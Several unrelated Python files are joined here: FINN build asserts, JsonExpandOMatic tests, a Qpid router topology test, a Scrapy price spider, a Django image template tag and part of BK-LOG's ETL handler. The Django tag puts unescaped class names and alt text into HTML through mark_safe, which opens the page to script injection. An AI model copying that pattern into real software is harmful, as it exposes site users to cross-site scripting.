assert os.path.isfile(output_dir + "/report/estimate_layer_cycles.json")
assert os.path.isfile(output_dir + "/report/estimate_layer_resources.json")
assert os.path.isfile(
output_dir + "/report/estimate_layer_config_alternatives.json"
)
assert os.path.isfile(output_dir + "/report/estimate_network_performance.json")
assert os.path.isfile(output_dir + "/report/ooc_synth_and_timing.json")
assert os.path.isfile(output_dir + "/report/rtlsim_performance.json")
assert os.path.isfile(output_dir + "/bitfile/finn-accel.bit")
assert os.path.isfile(output_dir + "/bitfile/finn-accel.hwh")
assert os.path.isfile(output_dir + "/report/post_synth_resources.xml")
assert os.path.isfile(output_dir + "/report/post_route_timing.rpt")
# verification outputs
verify_out_dir = output_dir + "/verification_output"
assert os.path.isfile(verify_out_dir + "/verify_initial_python_SUCCESS.npy")
assert os.path.isfile(verify_out_dir + "/verify_streamlined_python_SUCCESS.npy")
assert os.path.isfile(verify_out_dir + "/verify_folded_hls_cppsim_SUCCESS.npy")
assert os.path.isfile(verify_out_dir + "/verify_stitched_ip_rtlsim_SUCCESS.npy")
|
import json
import os
import pytest
from json_expand_o_matic import JsonExpandOMatic
class TestLeaves:
"""Test `leaf_node` functionality."""
# Our raw test data.
_raw_data = None
@pytest.fixture
def raw_data(self, resource_path_root):
if not TestLeaves._raw_data:
TestLeaves._raw_data = json.loads((resource_path_root / "actor-data.json").read_text())
return TestLeaves._raw_data
# Fixtures to provide copies of the raw data to each test function.
@pytest.fixture
def test_data(self, raw_data):
return json.loads(json.dumps(raw_data))
@pytest.fixture
def original_data(self, raw_data):
return json.loads(json.dumps(raw_data))
def test_actors1(self, tmpdir, test_data, original_data):
"""Verify that we can create a json file for each actor and not recurse any further."""
self._actors_test(tmpdir, test_data, original_data, "/root/actors/.*")
def test_actors2(self, tmpdir, test_data, original_data):
"""Same as test_actors1 but with a more precise regex."""
self._actors_test(tmpdir, test_data, original_data, "/root/actors/[^/]+")
def test_charlie1(self, tmpdir, test_data, original_data):
"""Verify that we can single out an actor."""
self._charlie_test(tmpdir, test_data, original_data, "/root/actors/charlie_chaplin")
def test_charlie2(self, tmpdir, test_data, original_data):
"""Like test_charlie1 but with a loose wildcard."""
self._charlie_test(tmpdir, test_data, original_data, "/root/actors/[abcxyz].*")
def test_charlie3(self, tmpdir, test_data, original_data):
"""Like test_charlie1 but with tighter regex."""
self._charlie_test(tmpdir, test_data, original_data, "/root/actors/[abcxyz][^/]+")
def test_nested1(self, tmpdir, test_data, original_data):
"""Test a simple leaf_nodes scenario."""
expanded = JsonExpandOMatic(path=tmpdir).expand(
test_data,
root_element="root",
preserve=False,
leaf_nodes=[{"/root/actors/.*": ["/[^/]+/movies/.*", "/[^/]+/filmography"]}],
)
assert expanded == {"root": {"$ref": f"{tmpdir.basename}/root.json"}}
# This is the same thing you would expect in the non-nested case.
self._assert_root(tmpdir)
self._assert_actors(tmpdir)
# Unlike the non-nested case with regex "/root/actors/.*", the nested case
# will have a directory per actor.
# See the discussion in test_nested1_equivalency on why this is.
self._assert_actor_dirs(tmpdir)
# The nested "/[^/]+/movies/.*" gives us a file-per-movie
self._assert_movies(tmpdir)
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/movies/modern_times.json")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies/0.json")
        # It is also worth noting that other dicts not explicitly mentioned in the list
# of nested expressions are given no special treatment.
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses.json")
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses")
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses/oona_oneill.json")
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses/oona_oneill")
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses/oona_oneill/children.json")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/hobbies.json")
assert not os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/hobbies")
def test_nested1_equivalency(self, tmpdir, test_data, original_data):
"""
In a nested leaf-node expression the dict key is treated as it
would be in the non-nested case.
The nested functionality takes the file written by that expression
and feeds it back through JsonExpandOMatic with the dict's value
as the new leaf_nodes parameter value.
        You can represent any of the nested expressions as non-nested but,
        IMO, nested expressions can be easier to follow in some cases.
"""
import glob
JsonExpandOMatic(path=f"{tmpdir}/n").expand(
test_data,
root_element="root",
preserve=False,
leaf_nodes=[{"/root/actors/.*": ["/[^/]+/movies/.*", "/[^/]+/filmography"]}],
)
nested_files = [x.replace(f"{tmpdir}/n", "") for x in glob.glob(f"{tmpdir}/n", recursive=True)]
JsonExpandOMatic(path=f"{tmpdir}/f").expand(
test_data,
root_element="root",
preserve=False,
leaf_nodes=["/root/actors/.*/movies/.*", "/root/actors/.*/filmography"],
)
flattened_files = [x.replace(f"{tmpdir}/f", "") for x in glob.glob(f"{tmpdir}/f", recursive=True)]
assert nested_files == flattened_files
def test_nested2(self, tmpdir, test_data, original_data):
"""Test a targeted leaf_node exmple.
The expressions listed in the dict value are relative to the
element matched by the dict key expression.
        Our previous examples used a regex to ignore that but we can do
interesting things with it if we want.
In this example we will collapse all of Dwayne Johnson's movies
and Charlie Chaplin's spouses.
"""
expanded = JsonExpandOMatic(path=tmpdir).expand(
test_data,
root_element="root",
preserve=False,
leaf_nodes=[{"/root/actors/.*": ["/dwayne_johnson/movies", "/charlie_chaplin/spouses"]}],
)
assert expanded == {"root": {"$ref": f"{tmpdir.basename}/root.json"}}
# This is the same thing you would expect in the non-nested case.
self._assert_root(tmpdir)
self._assert_actors(tmpdir)
# Unlike the non-nested case with regex "/root/actors/.*", the nested case
# will have a directory per actor.
# See the discussion in test_nested1_equivalency on why this is.
self._assert_actor_dirs(tmpdir)
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/movies.json")
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/movies")
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses.json")
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies.json")
assert not os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies")
def xtest_enhanced_nested1(self, tmpdir, test_data, original_data):
"""Enhanced nested #1...
But what if we want a single json file per actor to include
everything about that actor _except_ movies and a separate
movies.json for each actor with all of that actor's movie data?
You might initially have thought that we would do:
leaf_nodes=[{"/root/actors/.*": ["/[^/]+/movies/.*"]}]
But we have already established that is equivalent to:
leaf_nodes=["/root/actors/.*/movies/.*"]
We will stop recursion at each movie but everything else will be
done as normal (i.e. - file per dict/list).
Or maybe you would consider:
leaf_nodes=["/root/actors/.*", "/root/actors/.*/movies/.*"]
or:
leaf_nodes=["/root/actors/.*/movies/.*", "/root/actors/.*"]
But that won't work because "/root/actors/.*" will stop recursion
before paths matching "/root/actors/.*/movies/.*" are seen.
Remember: All regexes are checked for each path & the first one
matching stops recursion.
This is what we will do:
[
{
"/root/actors/.*": [
"/[^/]+/movies/.*",
"<A:/.*"
]
}
]
The key of the nested expression ("/root/actors/.*") tells expand
to start a new JsonExpandOMatic recursion and save the resulting
"mangled" data as {actor}.json when that recursion completes.
That is normal nested behavior; with "/[^/]+/movies/.*" expand
would create {movie}.json but would still expand any other
dict/list found for the actor.
The '<A:' prefix, however, alters the behavior for those paths that
are matched by the expression "/.*". This expression will be applied
after (A) recursion and the result included (<) in their parent.
"""
JsonExpandOMatic(path=tmpdir).expand(
test_data,
root_element="root",
preserve=False,
leaf_nodes=[{"/root/actors/.*": ["/[^/]+/movies/.*", "<A:/.*"]}],
)
# This is the same thing you would expect in the non-nested case.
self._assert_root(tmpdir)
self._assert_actors(tmpdir)
# Unlike the non-nested case with regex "/root/actors/.*", the nested case
# will have a directory per actor.
# See the discussion in test_nested1_equivalency on why this is.
self._assert_actor_dirs(tmpdir)
# The nested "/[^/]+/movies/.*" gives us a file-per-movie
self._assert_movies(tmpdir)
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/movies/modern_times.json")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies/0.json")
# TODO: Explain these assertions
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses.json")
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses")
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses/lita_grey.json")
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses/lita_grey")
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses/lita_grey/children.json")
assert not os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/hobbies.json")
assert not os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/hobbies")
with open(f"{tmpdir}/root/actors/charlie_chaplin.json") as f:
data = json.load(f)
assert data.get("spouses", None)
assert data.get["spouses"].get("lita_grey", None)
assert data.get["spouses"]["lita_grey"].get("children", None)
def _actors_test(self, tmpdir, test_data, original_data, regex):
expanded = JsonExpandOMatic(path=tmpdir).expand(
test_data, root_element="root", preserve=False, leaf_nodes=[regex]
)
# preserve=False allows mangling of test_data by expand()
assert test_data != original_data
# expand() returns a new representation of `data`
assert expanded == {"root": {"$ref": f"{tmpdir.basename}/root.json"}}
def _not(x):
return not x
# We expect to have the root and actors elements fully represented.
# Our leaf-node regex (/root/actors/.*) tells expand to create a
# per-actor file but not the per-actor directory or anything below that.
self._assert_root(tmpdir)
self._assert_actors(tmpdir)
self._assert_actor_dirs(tmpdir, f=_not)
self._assert_movies(tmpdir, f=_not)
def _charlie_test(self, tmpdir, test_data, original_data, regex):
expanded = JsonExpandOMatic(path=tmpdir).expand(
test_data, root_element="root", preserve=False, leaf_nodes=[regex]
)
assert expanded == {"root": {"$ref": f"{tmpdir.basename}/root.json"}}
self._assert_root(tmpdir)
self._assert_actors(tmpdir)
# No recursion for Charlie Chaplin
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin")
# Typical recursion for Dwayne Johnson
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies")
# etc...
def _assert_root(self, tmpdir):
# This is the wrapper around the original data
assert os.path.exists(f"{tmpdir}/root.json")
assert os.path.exists(f"{tmpdir}/root")
def _assert_actors(self, tmpdir):
# Now we look at the original data's files
assert os.path.exists(f"{tmpdir}/root/actors.json")
# A file for each actor
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin.json")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson.json")
def _assert_actor_dirs(self, tmpdir, f=lambda x: x):
# Now we look at the original data's files
assert os.path.exists(f"{tmpdir}/root/actors.json")
# A file for each actor
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin.json")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson.json")
# A directory for each actor
assert f(os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin"))
assert f(os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson"))
def _assert_movies(self, tmpdir, f=lambda x: x):
assert f(os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/movies.json"))
assert f(os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/movies"))
assert f(os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies.json"))
assert f(os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies"))
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import unittest
from proton import Message
from proton.handlers import MessagingHandler
from proton.reactor import Container
from system_test import TestCase, Qdrouterd, main_module, TIMEOUT
# ====================================================
# Helper classes for all tests.
# ====================================================
# Named timers allow test code to distinguish between several
# simultaneous timers, going off at different rates.
class Timeout:
def __init__(self, parent, name):
self.parent = parent
self.name = name
def on_timer_task(self, event):
self.parent.timeout(self.name)
# ================================================================
# Setup
# ================================================================
class TopologyAdditionTests (TestCase):
@classmethod
def setUpClass(cls):
super(TopologyAdditionTests, cls).setUpClass()
def router(name, more_config):
config = [('router', {'mode': 'interior', 'id': name}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address', {'prefix': 'balanced', 'distribution': 'balanced'}),
('address', {'prefix': 'multicast', 'distribution': 'multicast'})
] \
+ more_config
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
cls.routers = []
client_ports = dict()
client_ports['A'] = cls.tester.get_port()
client_ports['B'] = cls.tester.get_port()
client_ports['C'] = cls.tester.get_port()
client_ports['D'] = cls.tester.get_port()
cls.inter_router_ports = dict()
cls.inter_router_ports['A'] = cls.tester.get_port()
cls.inter_router_ports['B'] = cls.tester.get_port()
initial_cost = 10
lower_cost = 8
higher_cost = 12
# Only routers A and B are set up initially by this class.
# Routers C and D are started by the test itself.
router_A_config = [
('listener',
{'port': client_ports['A'],
'role': 'normal',
'stripAnnotations': 'no'
}
),
('listener',
{'role': 'inter-router',
'port': cls.inter_router_ports['A']
}
)
]
router_B_config = [
('listener',
{'port': client_ports['B'],
'role': 'normal',
'stripAnnotations': 'no'
}
),
('listener',
{'role': 'inter-router',
'port': cls.inter_router_ports['B'],
'stripAnnotations': 'no'
}
),
('connector',
{'name': 'AB_connector',
'role': 'inter-router',
'port': cls.inter_router_ports['A'],
'cost': initial_cost,
'stripAnnotations': 'no'
}
)
]
router('A', router_A_config)
router('B', router_B_config)
router_A = cls.routers[0]
router_B = cls.routers[1]
router_A.wait_router_connected('B')
cls.A_addr = router_A.addresses[0]
cls.B_addr = router_B.addresses[0]
# The two connections that this router will make, AC and BC,
# will be lower cost than the direct AB route that the network
# already has.
cls.router_C_config = [
('listener',
{'port': client_ports['C'],
'role': 'normal',
'stripAnnotations': 'no'
}
),
('connector',
{'name': 'AC_connector',
'role': 'inter-router',
'port': cls.inter_router_ports['A'],
'cost': int(lower_cost / 2),
'stripAnnotations': 'no',
'linkCapacity' : 1000
}
),
('connector',
{'name': 'BC_connector',
'role': 'inter-router',
'port': cls.inter_router_ports['B'],
'cost': int(lower_cost / 2),
'stripAnnotations': 'no',
'linkCapacity' : 1000
}
)
]
# The two connections that this router will make, AD and BD,
# will be higher cost than the other paths the networks already has
# available to get from A to B.
cls.router_D_config = [
('listener',
{'port': client_ports['D'],
'role': 'normal',
'stripAnnotations': 'no'
}
),
('connector',
{'name': 'AD_connector',
'role': 'inter-router',
'port': cls.inter_router_ports['A'],
'cost': int(higher_cost / 2),
'stripAnnotations': 'no',
'linkCapacity' : 1000
}
),
('connector',
{'name': 'BD_connector',
'role': 'inter-router',
'port': cls.inter_router_ports['B'],
'cost': int(higher_cost / 2),
'stripAnnotations': 'no',
'linkCapacity' : 1000
}
)
]
# This method allows test code to add new routers during the test,
# rather than only at startup like A and B above.
def addRouter(self, name, more_config) :
config = [('router', {'mode': 'interior', 'id': name}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address', {'prefix': 'balanced', 'distribution': 'balanced'}),
('address', {'prefix': 'multicast', 'distribution': 'multicast'})
] \
+ more_config
config = Qdrouterd.Config(config)
TopologyAdditionTests.routers.append(TopologyAdditionTests.tester.qdrouterd(name, config, wait=True))
def test_01_new_route_low_cost(self):
# During the test, test code will add a new router C,
# connecting A and B with new low-cost links. At that
# point the test's messages should switch from using
# route AB to using route ACB.
# By passing both of these routes to the test, I tell
# it to expect both of them to be used.
# If it terminates with the second path remaining unused
# it will fail.
#
# Since this test alters the path that the messages follow,
# it is OK for some messages to be released rather than
# delivered. It doesn't always happen - depends on timing.
initial_expected_trace = ['0/A', '0/B']
final_expected_trace = ['0/A', '0/C', '0/B']
released_ok = True
test = AddRouter(self.A_addr,
self.B_addr,
"closest/01",
self,
'C',
self.router_C_config,
[initial_expected_trace, final_expected_trace],
released_ok
)
test.run()
self.assertIsNone(test.error)
def test_02_new_route_high_cost(self):
# During the test, test code will add a new router D,
# connecting A and B with new links. But the links are
# higher cost than what already exist. The network should
# ignore them and keep using the lowest cost route that it
# already has.
# We communicate this expectation to the test by sending
# it a single expected trace. The test will fail with an
# error if any other trace is encountered.
#
# Since this test does not alter the path that the messages
# follow, it is *not* OK for any messages to be released
# rather than delivered.
only_expected_trace = ['0/A', '0/C', '0/B']
released_ok = False
test = AddRouter(self.A_addr,
self.B_addr,
"closest/02",
self,
'D',
self.router_D_config,
[only_expected_trace],
released_ok
)
test.run()
self.assertIsNone(test.error)
# ================================================================
# Tests
# ================================================================
# --------------------------------------------------------------
#
# First test
# ------------------
#
# Send some messages through the original A---B router network,
# Then change it to look like this:
#
# C
# / \
# / \
# / \
# / \
# A -------- B
#
# But the caller controls what costs are assigned to the two
# new links, so only the caller knows whether messages should
# start to flow through the new route ACB or not. It passes
# that knowledge in to us as a list of expected paths.
# This test's job is to make sure that all the expected paths
# get used by messages, and no others get used.
#
#
# Second test
# ------------------
#
# The triangular network from the first test still exists, and
# we will add to it a new router D which also connects A and B.
#
# C
# / \
# / \
# / \
# / \
# A -------- B
# \ /
# \ /
# \ /
# \ /
# D
# As in the first test, the caller tells us what routes ought
# to be followed, by putting them in the 'expected_traces' arg.
#
# --------------------------------------------------------------
class AddRouter (MessagingHandler):
def __init__(self,
send_addr,
recv_addr,
destination,
parent,
new_router_name,
new_router_config,
expected_traces,
released_ok
):
super(AddRouter, self).__init__(prefetch=100)
self.send_addr = send_addr
self.recv_addr = recv_addr
self.dest = destination
self.parent = parent
self.new_router_name = new_router_name
self.new_router_config = new_router_config
self.released_ok = released_ok
self.error = None
self.sender = None
self.receiver = None
self.n_messages = 30
self.n_sent = 0
self.n_received = 0
self.n_released = 0
self.n_accepted = 0
self.test_timer = None
self.send_timer = None
self.timeout_count = 0
self.reactor = None
self.container = None
self.finishing = False
# The parent sends us a list of the traces we
# ought to see on messages.
# Make a little data structure that
# will keep track of how many times each trace was seen.
self.expected_trace_counts = list()
for i in range(len(expected_traces)) :
self.expected_trace_counts.append([expected_traces[i], 0])
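# Illustrative shape of that structure (not from the source), using the
# traces passed in by test_01:
#   expected_traces       = [['0/A', '0/B'], ['0/A', '0/C', '0/B']]
#   expected_trace_counts = [[['0/A', '0/B'], 0], [['0/A', '0/C', '0/B'], 0]]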
def run(self) :
Container(self).run()
# Close everything and allow the test to terminate.
def bail(self, reason_for_bailing) :
self.finishing = True
self.error = reason_for_bailing
self.receiver.close()
self.send_conn.close()
self.recv_conn.close()
self.test_timer.cancel()
self.send_timer.cancel()
# There are two timers. The 'test' timer should only expire if
# something has gone wrong, in which case it terminates the test.
# The 'send' timer expires frequently, and every time it goes off
# we send out a little batch of messages.
def timeout(self, name):
if self.finishing :
return
self.timeout_count += 1
if name == "test" :
self.bail("Timeout Expired: %d messages received, %d expected." % (self.n_received, self.n_messages))
elif name == "send" :
self.send()
self.send_timer = self.reactor.schedule(1, Timeout(self, "send"))
# At T+5, create the new router with link costs as
# specified by parent. We do it partway into the test
# so that some messages will flow through the original
# network, and some will flow through the network with
# the new router added.
if self.timeout_count == 5 :
self.parent.addRouter(self.new_router_name, self.new_router_config)
def on_start(self, event):
self.reactor = event.reactor
self.container = event.container
self.test_timer = self.reactor.schedule(TIMEOUT, Timeout(self, "test"))
self.send_timer = self.reactor.schedule(1, Timeout(self, "send"))
self.send_conn = event.container.connect(self.send_addr)
self.recv_conn = event.container.connect(self.recv_addr)
self.sender = event.container.create_sender(self.send_conn, self.dest)
self.receiver = event.container.create_receiver(self.recv_conn, self.dest)
self.receiver.flow(self.n_messages)
# ------------------------------------------------------------
# Sender Side
# ------------------------------------------------------------
def send(self):
if self.n_sent >= self.n_messages :
return
# Send little bursts of 3 messages every sender-timeout.
for _ in range(3) :
msg = Message(body=self.n_sent)
self.sender.send(msg)
self.n_sent += 1
if self.n_sent == self.n_messages :
return
# The caller of this test decides whether it is OK or
# not OK to have some messages released during the test.
def on_released(self, event) :
if self.released_ok :
self.n_released += 1
self.check_count()
else :
self.bail("a message was released.")
def on_accepted(self, event) :
self.n_accepted += 1
self.check_count()
#
# Do the released plus the accepted messages add up to the number
# that were sent? If so, bail out with success.
# Do NOT end the test if the number is still shy of the expected
# total. The callers of this method just call it every time they
# get something -- it will be called many times per test.
#
# Please note:
# This check is on the 'sender' side of this test, rather than the
# 'receiver' side, because it is to the sender that we make a
# guarantee: namely, that the sender should know the disposition of
# all sent messages -- whether they have been accepted by the receiver,
# or released by the router network.
#
def check_count(self) :
if self.n_accepted + self.n_released == self.n_messages :
self.finishing = True
self.finish_test()
# ------------------------------------------------------------
# Receiver Side
# ------------------------------------------------------------
def on_message(self, event):
if self.finishing :
return
self.n_received += 1
trace = event.message.annotations['x-opt-qd.trace']
# Introduce flaws for debugging.
# if self.n_received == 13 :
# trace = [ '0/B', '0/A', '0/D' ]
# if self.n_received == 13 :
# self.n_received -= 1
self.record_trace(trace)
self.check_count()
# Compare the trace that came from a message to the list of
# traces the caller told us to expect. If it is one of the
# expected traces, count it. Otherwise, fail the test.
def record_trace(self, observed_trace):
for trace_record in self.expected_trace_counts :
trace = trace_record[0]
if observed_trace == trace :
trace_record[1] += 1
return
# If we get here, the trace is one we were not expecting. That's bad.
self.bail("Unexpected trace: %s" % observed_trace)
# Shut down everything and make sure that all of the expected traces
# have been seen.
def finish_test(self) :
self.test_timer.cancel()
self.send_timer.cancel()
for trace_record in self.expected_trace_counts :
count = trace_record[1]
# Deliberate flaw for debugging.
# count = 0
if count <= 0 :
self.bail("Trace %s was not seen." % trace_record[0])
return
# success
self.bail(None)
if __name__ == '__main__':
unittest.main(main_module())
|
import re
import os
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request, HtmlResponse
from scrapy.utils.response import get_base_url
from scrapy.utils.url import urljoin_rfc
from urllib import urlencode
import csv
from product_spiders.items import Product, ProductLoader
HERE = os.path.abspath(os.path.dirname(__file__))
class LuckyVitaminSpider(BaseSpider):
name = 'luckyvitamin.com'
allowed_domains = ['www.luckyvitamin.com', 'luckyvitamin.com']
start_urls = ('http://luckyvitamin.com/brands',)
def __init__(self, *args, **kwargs):
super(LuckyVitaminSpider, self).__init__(*args, **kwargs)
def parse(self, response):
if not isinstance(response, HtmlResponse):
return
hxs = HtmlXPathSelector(response)
# brands
brands = hxs.select(u'//ul[@class="alpha-categories"]//a/@href').extract()
for url in brands:
url = urljoin_rfc(get_base_url(response), url)
yield Request(url)
# pages
next_page = hxs.select(u'//li[@class="pagingArrow"]/a/@href').extract()
if next_page:
next_page = urljoin_rfc(get_base_url(response), next_page[0])
yield Request(next_page)
for product in self.parse_product(response):
yield product
def parse_product(self, response):
if not isinstance(response, HtmlResponse):
return
hxs = HtmlXPathSelector(response)
products = hxs.select(u'//ul[@class="product-list"]/li')
for product in products:
product_loader = ProductLoader(item=Product(), selector=product)
url = product.select(u'.//div[@class="listItemLink"]/a/@href').extract()[0]
url = urljoin_rfc(get_base_url(response), url)
product_loader.add_value('url', url)
name = product.select(u'.//div[@class="listBrand"]/text()').extract()[0]
name += ' ' + product.select(u'.//div[@class="listItemLink"]/a/text()').extract()[0]
name += ' ' + product.select(u'.//div[@class="listData"]/text()').extract()[0]
product_loader.add_value('name', name)
product_loader.add_xpath('price', u'.//span[@class="salePrice"]/span/text()',
re=u'\$(.*)')
yield product_loader.load_item()
|
from django import template
from django.conf import settings
from django.utils.safestring import mark_safe
from images.models import Image
register = template.Library()
@register.simple_tag
def insert_image(id, class_names):
image = Image.objects.get(id=id)
# Build the src from MEDIA_URL (a browser-servable prefix) rather than
# MEDIA_ROOT (a filesystem path), and mark the markup safe so the template
# engine does not escape it.
return mark_safe(f"<img src='{settings.MEDIA_URL}{image.file}' class='{class_names}' alt='{image.alt_tag}'>")
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import arrow
from django.utils.translation import ugettext_lazy as _
from django.db import transaction
from django.conf import settings
from apps.constants import UserOperationTypeEnum, UserOperationActionEnum
from apps.log_databus.exceptions import (
CollectorConfigNotExistException,
EtlParseTimeFormatException,
EtlStorageUsedException,
CollectorActiveException,
)
from apps.log_databus.handlers.etl_storage import EtlStorage
from apps.log_databus.tasks.bkdata import async_create_bkdata_data_id
from apps.log_databus.models import CollectorConfig, StorageCapacity, StorageUsed
from apps.log_search.handlers.index_set import IndexSetHandler
from apps.log_search.models import Scenario, ProjectInfo
from apps.log_search.constants import FieldDateFormatEnum
from apps.models import model_to_dict
from apps.utils.db import array_group
from apps.log_databus.handlers.storage import StorageHandler
from apps.log_databus.constants import REGISTERED_SYSTEM_DEFAULT
from apps.decorators import user_operation_record
from apps.utils.local import get_request_username
class EtlHandler(object):
def __init__(self, collector_config_id=None):
super().__init__()
self.collector_config_id = collector_config_id
self.data = None
if collector_config_id:
try:
self.data = CollectorConfig.objects.get(collector_config_id=self.collector_config_id)
except CollectorConfig.DoesNotExist:
raise CollectorConfigNotExistException()
def check_es_storage_capacity(self, cluster_info, storage_cluster_id):
if self.data.table_id:
return
es_storage_capacity = int(settings.ES_STORAGE_CAPACITY)
register_system = cluster_info["cluster_config"].get("registered_system")
if es_storage_capacity > 0 and register_system == REGISTERED_SYSTEM_DEFAULT:
biz_storage = StorageCapacity.objects.filter(bk_biz_id=self.data.bk_biz_id).first()
biz_storage_used = StorageUsed.objects.filter(
bk_biz_id=self.data.bk_biz_id, storage_cluster_id=storage_cluster_id
).first()
if biz_storage and biz_storage_used:
storage = biz_storage.storage_capacity
storage_used = biz_storage_used.storage_used
if storage > 0:
if storage_used >= storage:
raise EtlStorageUsedException()
def update_or_create(
self,
etl_config,
table_id,
storage_cluster_id,
retention,
allocation_min_days,
view_roles,
etl_params=None,
fields=None,
):
# Editing is not allowed while the collector is stopped
if self.data and not self.data.is_active:
raise CollectorActiveException()
# Storage cluster info
cluster_info = StorageHandler(storage_cluster_id).get_cluster_info_by_id()
self.check_es_storage_capacity(cluster_info, storage_cluster_id)
is_add = False if self.data.table_id else True
# 1. meta: create/update the result table
etl_storage = EtlStorage.get_instance(etl_config=etl_config)
etl_storage.update_or_create_result_table(
self.data,
table_id=table_id,
storage_cluster_id=storage_cluster_id,
retention=retention,
allocation_min_days=allocation_min_days,
fields=fields,
etl_params=etl_params,
es_version=cluster_info["cluster_config"]["version"],
hot_warm_config=cluster_info["cluster_config"].get("custom_option", {}).get("hot_warm_config"),
)
# 2. Create the index set
index_set = self._update_or_create_index_set(etl_config, storage_cluster_id, view_roles)
# Create the data platform data_id (also triggered on update)
async_create_bkdata_data_id.delay(self.data.collector_config_id)
# add user_operation_record
operation_record = {
"username": get_request_username(),
"biz_id": self.data.bk_biz_id,
"record_type": UserOperationTypeEnum.ETL,
"record_object_id": self.data.collector_config_id,
"action": UserOperationActionEnum.CREATE if is_add else UserOperationActionEnum.UPDATE,
"params": {
"etl_config": etl_config,
"table_id": table_id,
"storage_cluster_id": storage_cluster_id,
"retention": retention,
"allocation_min_days": allocation_min_days,
"view_roles": view_roles,
"etl_params": etl_params,
"fields": fields,
},
}
user_operation_record.delay(operation_record)
return {
"collector_config_id": self.data.collector_config_id,
"collector_config_name": self.data.collector_config_name,
"etl_config": etl_config,
"index_set_id": index_set["index_set_id"],
"scenario_id": index_set["scenario_id"],
"storage_cluster_id": storage_cluster_id,
"retention": retention,
}
def etl_preview(self, etl_config, etl_params, data):
etl_storage = EtlStorage.get_instance(etl_config=etl_config)
fields = etl_storage.etl_preview(data, etl_params)
return {"fields": fields}
def etl_time(self, time_format, time_zone, data):
"""
Parse the time field
"""
fmts = array_group(FieldDateFormatEnum.get_choices_list_dict(), "id", True)
fmt = fmts.get(time_format)
if len(data) != len(fmt["description"]):
raise EtlParseTimeFormatException()
if time_format in ["epoch_second", "epoch_millis", "epoch_micros"]:
epoch_second = str(data)[0:10]
else:
try:
epoch_second = arrow.get(data, fmt["name"], tzinfo=f"GMT{time_zone}").timestamp
except Exception:
raise EtlParseTimeFormatException()
return {"epoch_millis": f"{epoch_second}000"}
@transaction.atomic()
def _update_or_create_index_set(self, etl_config, storage_cluster_id, view_roles=None):
"""
Create or update the index set
"""
